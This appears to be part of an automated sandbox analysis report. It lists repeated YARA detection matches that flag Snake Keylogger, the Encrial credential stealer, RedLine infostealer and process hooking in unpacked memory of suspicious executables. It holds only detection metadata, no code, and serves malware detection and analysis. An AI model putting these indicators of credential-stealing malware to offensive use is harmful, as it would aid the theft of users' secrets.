                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.brightness.exe.215f2418.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.brightness.exe.21659f78.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.Aiymwhpj.PIF.212333d8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
